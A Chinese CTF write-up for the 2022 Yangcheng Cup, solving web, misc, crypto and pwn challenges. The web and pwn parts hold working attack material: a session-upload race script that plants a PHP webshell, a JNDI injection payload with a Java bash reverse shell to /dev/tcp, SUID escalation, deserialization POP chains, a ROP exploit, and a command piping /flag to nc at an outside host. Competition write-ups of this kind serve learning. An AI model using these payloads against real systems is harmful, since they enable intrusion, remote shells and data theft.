2022年羊城杯wp

2022年羊城杯wp

web

rce_me

<?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
     $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
         foreach($blacklist as $blackword){
           if(stristr($var, $blackword)) return False;
    }
    return True;
}  
if(fliter($_SERVER["QUERY_STRING"]))
{
include $file;
}
else
{
die("Noooo0");
}

获取webshell,题目中过滤了很多字符,但是可以利用echo写shell,参考链接
https://blog.csdn.net/chizhaji/article/details/113521985?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&utm_relevant_index=1
发现需要同时发包,利用脚本也可以直接发包

# coding=utf-8
import io
import requests
import threading
sessid = 'flag'
data = {"cmd": "system('cat f*');"}
url = "http://80.endpoint-9588ad86d7e34833b12f992204ec90da.dasc.buuoj.cn:81/"
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url,
                            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php eval($_POST[cmd]);fputs(fopen('a.php','w'),'<?php @eval($_POST[wa1ki0g])?>');?>"},
                            files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})
def read(session):
    while True:
        resp = session.post(url+'?file=/tmp/sess_' + sessid,
                            data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            pass
if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

在这里插入图片描述
脚本会响应10秒左右报错。但是shell上传成功
在这里插入图片描述
在这里插入图片描述
读取不到flag,需要提权
内核是Linux,考虑suid提权
在这里插入图片描述
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
利用date来提权
在这里插入图片描述
获取flag
在这里插入图片描述

step_by_step-v3

<?php
error_reporting(0);
class yang
{
    public $y1;
    public function __construct()
    {
        $this->y1->magic();
    }
    public function __tostring()
    {
        ($this->y1)();
    }
    public function hint()
    {
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}
class cheng
{
    public $c1;
    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }
    public function __invoke()
    {
        $this->c1->hint();
    }
}
class bei
{
    public $b1;
    public $b2;
    public function __set($k1,$k2)
    {
        print $this->b1;
    }
    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}
if (isset($_POST['ans'])) {
    unserialize($_POST['ans']);
} else {
    highlight_file(__FILE__);
}
?>

看代码可以直接调用tostring执行phpinfo,因此直接给类yang y1变量给phpinfo,赋值之后会调用bei类中__set方法,再去调用cheng类中tostring方法执行phpinfo

在这里插入图片描述
pop链

<?php
class yang
{
    public $y1;
}
class cheng
{
    public $c1;
}
class bei
{
    public $b1;
    public $b2;
}
$yang=new yang();
$cheng=new cheng();
$bei=new bei();
$yang->y1="phpinfo";
$bei->b1=$yang;
$cheng->c1=$bei;
echo serialize($cheng);
?>

info中直接搜索flag

在这里插入图片描述

simple_json

打开附件是一个java的包,翻看源码包发现几个可疑点
存在三个路由:

在这里插入图片描述
版本为1.8
在这里插入图片描述
有2个log4j的包,并且有在Test.class下存在可疑的攻击点
在这里插入图片描述
转换json格式

{
    "content":{
        "@type":"ycb.simple_json.service.JNDIService",
        "target":"ldap://101.33.211.155:8087/aaa"
    },
    "msg":{
        "$ref":"$.content.context"
    }
}

所以开始构造
需要用到的工具:https://github.com/Bl0omZ/JNDIEXP

利用链特殊说明
snakeyaml : command=http://127.0.0.1:8080/exp.jar 加载恶意类。可以使用提供的yaml-payload-master(需要修改代码,重新生成jar,内附使用说明)。无法使用reverseshell。
ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080/exp.jar
ldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwL2V4cC5qYXI%3D
C3p0 :command=http://127.0.0.1:8080:Exploit(端口为默认为8080) data目录下的Exploit可以进行参考,直接修改Exploit.java的命令使用javac编译(不用另外起http服务)
ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080:Exploit
ldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwOkV4cGxvaXQ%3D

在这里插入图片描述
参照这个进行
修改vps地址,再编译,放到工具的同级目录

  8 public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
  9
 10     public AwesomeScriptEngineFactory() {
 11         try {
 12             Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/xx.xx.xx/9998 0>&1");
 13         } catch (IOException e) {
 14             e.printStackTrace();
 15         }
 16     }

在这里插入图片描述用python3起一个http服务

python3 -m http.server 905

在这里插入图片描述
将JNDIInject-1.2-SNAPSHOT.jar服务起来
在这里插入图片描述
nc监听
在这里插入图片描述burp发包触发

POST /ApiTest/post HTTP/1.1
Host: 8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81
Content-Length: 258
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Origin: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81/ApiTest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
   "content":{
     "@type":"ycb.simple_json.service.JNDIService",
     "target":
     "ldap://xx.xx.xx.xx:1389/snakeyaml/http://xx.xx.xx:905/exp.jar"
    },
    "msg":{
      "$ref":"$.content.context"
    }
}

在这里插入图片描述shell弹回来了
获取flag

在这里插入图片描述

ComeAndLogin

题目为登录可能存在注入
扫描目录存在5个文件访问

在这里插入图片描述
只有admin.php页面才能访问,需要admin权限
在这里插入图片描述
抓包发现username&password都存在注入
FUZZ发现username处过滤了单引号,并且%27,十六进制都被过滤,直接用反斜杠可以
在这里插入图片描述
在这里插入图片描述

页面返回正常
接着在password上测试,发现过滤了空格,考虑都使用url编码绕过
在这里插入图片描述
登录成功
再访问admin.php
在这里插入图片描述
根据代码提示需要以POST接收path参数的值,并且需要有大于三个以上的/,绕过即可
https://blog.csdn.net/m0_62805300/article/details/124218779
在参考文章中使用软连接获取flag
构造payload:

path=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag

在这里插入图片描述

Safepop

原题链接:https://xz.aliyun.com/t/10961

<?php
class Fun{
    private $func;
    public function __construct(){
    $this->func = [new Test,'getFlag'];//也可以写为$this->func = "Test::getFlag";这样由于没有实例化Test类,还不会触发Test里的__wakeup()
    }
}
class Test{
    public function getFlag(){
    }
}
class A{
    public $a;
}
class B{
    public $p;
}
$Test = new Test;
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;
$b->a = $a;
$r = serialize($b);
$r1 = str_replace('"Fun":1:','"Fun":2:',$r);
echo urlencode($r1);

不用改直接贴
payload:

?pop=O%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3BN%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Test%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7D%7D%7D

在这里插入图片描述

MISC

签到

在这里插入图片描述
在这里插入图片描述

寻宝

file = open('./寻宝','rb').read()
datalist = ('{:02X}'.format(int(i)) for i in file)
print(datalist)
out = open('./1.txt','w')
for j in list(datalist):
    j = j[::-1]
    out.write(j+'')

解出的文本是十六进制

在这里插入图片描述
解出之后为
在这里插入图片描述
根据游戏和提示得到钢琴判断字符114514
在这里插入图片描述
根据图片看出为差分曼切斯特编码01011111011000010011000101011111解出为_a1_
在这里插入图片描述
在这里插入图片描述
获取flag.zip密码
在这里插入图片描述
零宽度字符隐写
在这里插入图片描述

迷失幻境

取证题目,刚好有取证大师
将镜像放入取证大师
存在两个文件,一个是45文本文件,一个是jpg文件

在这里插入图片描述
挨个分析两个文件
首先是45文本文件,找了一个正常的png图片和在取证大师的十六进制中45文件对比,发现文件具备png的头部信息,但是缺少png头
在这里插入图片描述
将45文件,放入010加补全头部信息
在这里插入图片描述
提取出来完整的png图
接着在在取证大师的PNG文件有99张图,抽样分析发现图都是一样的,迷惑而已
在这里插入图片描述
导出PNG图,用Stegolve工具异或
在这里插入图片描述
在这里插入图片描述
接着分析jpg图,是一个萝莉照片,人畜无害
结合png图的key:可莉前来报道 ,应该是跟萝莉图有关
既然有密码也有图,图片也没有加密,只有考虑为隐写了,使用outguess工具得到flag

outguess -k "可莉前来报道" -r /home/kali/Desktop/test1/h.jpg flag.txt

在这里插入图片描述

where_is_secret

解出压缩包

在这里插入图片描述
再通过https://shimo.im/docs/gwpcxkryVJwyJVHR/read里的一起看小说吗

from PIL import Image
def decode(im):
    width,height = im.size
    lst = []
    for y in range(height):
        for x in range(width):
            red,green,blue = im.getpixel((x,y))
            if(blue | green | red) == 0:
                break
            index = (green<<8) + blue
            lst.append(chr(index))
    return ''.join(lst)
if __name__=='__main__':
    all_text = decode(Image.open("./out.bmp","r"))
    with open ("decode.text","w",encoding = "utf-8") as f:
        f.write(all_text)

在这里插入图片描述
在这里插入图片描述
通过筛选{}中间的值就可以得到h1d3_1n_th3_p1ctur3

Unlimited Zip Works

在这里插入图片描述

解压看到有注释
用zipfile分析压缩包信息并提取注释信息
看到注释里面还有个压缩包
在这里插入图片描述
直接提取注释中的压缩包

import zipfile
name = 'file'
infolist = []
num = 1
newzip=b''
while True:
    fz = zipfile.ZipFile(name + '.zip', 'r')
    for i in fz.namelist():
        if "zip" in i:
            filename = i[0:5]
            # print(filename)
    fz.extractall(pwd=bytes(filename, 'utf-8'))
    num += 1
    name = filename
    for j in fz.infolist():
        infolist.append(j.comment)
        if 'flag.txt' in str(j):
            print('[+] 解压完成')
            list2 = infolist[::-1]
            for k in list2:
                newzip += k
            with open('./newfile.zip','wb') as f:
                f.write(newzip)
                print("[+] 成功生成新压缩包newfile.zip")
            exit(0)

在这里插入图片描述
新压缩包中还套着压缩包

from zipfile import ZipFile
data = []
with ZipFile( 'newfile.zip', 'r') as zf:
    for i in zf.infolist():
        data.append(i.extra)
with open('flag.zip','wb') as fz:
    for i in data:
        fz.write(i)

脚本直接提

在这里插入图片描述
图片没什么内容
010分析下面又是压缩包直接提
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

躲猫猫

在这里插入图片描述
在流量包里发现有个zip将它导出
在这里插入图片描述

找到一张png图片

在这里插入图片描述

在这里插入图片描述

发现压缩包里的key.log是没有加密的把它导入加解密之后在http2流量里发现了一张jpg图片将它导出
在这里插入图片描述

找到压缩包密码

在这里插入图片描述

解出压缩包

在这里插入图片描述
看到脚本之后发现是某ctf原题改一下x,y解密出来一张图片
https://blog.csdn.net/weixin_51122085/article/details/125851791
在这里插入图片描述
看到图片猜测为Dotcode但是发现这个中间是圆形或者正方形而解密出来的图片是五边形
在这里插入图片描述
在左侧列表中看到Maxicode中间是五边形的

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

CRYPTO

Easyrsa

import gmpy2
p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
f = open('output.txt','r')
for i in f.readlines()[::-1]:
    e = 65537
    n = int(i)
    q = n//p
    d = int(gmpy2.invert(e, (p - 1) * (q - 1)))
    m = pow(c, d, n)
    c = m
print(bytes.fromhex(hex(m)[2:]))
f.close()

lrsa

$$
t=(p-58)P+q-kQ\\\\
kQ-(p-58)P=q-t\approx q\\\\
L=\begin{pmatrix}
1&P\\
&Q
\end{pmatrix}\\\\
b=(58-p,k)L=(58-p,q-t)\\\\
|b|\le2^{\frac{1}{4}}det(L)^{\frac{1}{2}}
$$

由上面的式子关系,可以直接格出q-t,而t已知且很小,那么就能得到q

from Crypto.Util.number import *
B=1023
PPQ=17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981
PQQ=17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909
t=44
c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746
PQ=GCD(PPQ,PQQ)
P=PPQ//PQ
Q=PQQ//PQ
# sage 
P,Q,t=25947339118736016261419550658264175914664266822085997909314096786508816404704696671837899420298768803641977765786592354116676036035881712512184992851487828263900367476619650087372125353190561974783134059421570649293920248116730478378196277387377082481961542018611824082110164117796622604412648512092528479878502094797494405077897059911764470830302447618882229233093021156725194893124743848364119720591518073753197359351271987724752861168913839307431377592888760273762302003490303315903644695784992125784390012046834505490167165377346036077504298195544062111718133371983287540723388743607671934081891907851056034062109,26068172028162605137516470004551766376185367701690988148920400408760716114172673253571631718337447931195718779018987169967053546674529251665443499183399035216407895285607965767100708187327533611193709308966698251023076404422362272378862918994525181107002728889256377161661579892599243396304207048944032235378667269998644227976609632271355152717352269223310163307304914315780234040829575689991453848537587516055955657960061856059046256125836544109066275645648666876772298883460637600522819402448386193499472702636751025558486665290530268273787746964353937663176851849214999005525738643454160169651485201028944583316101,44
# L=matrix(ZZ,[[1,P],[0,Q]])
# print(L.LLL()[0][1])
a=71239161441539946834999944364158306978517617517717217001776063773301330324729178632534286023377366747004115034635139042058644768011502688969022553791977558750633767627495955645170437100983708648876951588485253787441732757259210010467734037546118780321368088487269039555130213851691659851510403573663333586407
assert isPrime(a+t)
q=a+t
e=65537
d=inverse(e,q-1)
m=pow(c,d,q)
print(long_to_bytes(m))

PWN

在这里插入图片描述
.shell cat/flag | nc 124.223.104.219 1234

fakeNoOutput-v2

from pwn import*
context.log_level='debug'
elf=ELF('fakeNoOutput')
p=remote('tcp.dasc.buuoj.cn',20112)
#p=process('./fakeNoOutput')
libc = ELF('libc.so.6')
head='''head /upload HTTP/1.1
HTTP_SERVER1_token: 
User-Agent: 
Cookie: 
Referer: 
Content-Length: 4196
'''
p.sendline(head)
p.sendline('Content:filename=')
text = 0x080496A1
main = 0x8049F77
setbuf = elf.got['fwrite']
payload='a'*0x1040
payload+='bbbb'
payload+=p32(text)
payload+=p32(main)
payload+=p32(setbuf)
p.sendline(payload + '\n')
p.recvuntil('Connection: close\r\n\r\n')
p.recvuntil('Connection: close\r\n\r\n')
libc_base = u32(p.recv(4))-libc.sym['fwrite']
system = libc_base+libc.sym['system']
binsh = libc_base+libc.search('/bin/sh').next()
p.sendline(head)
p.sendline('Content:filename=')
payload='a'*0x1040
payload+='bbbb'
payload+=p32(system)
payload+='bbbb'
payload+=p32(binsh)
p.sendline(payload + '\n')
p.interactive()
                       

点击阅读全文

上一篇 2023年 6月 14日 am10:38
下一篇 2023年 6月 14日 am10:41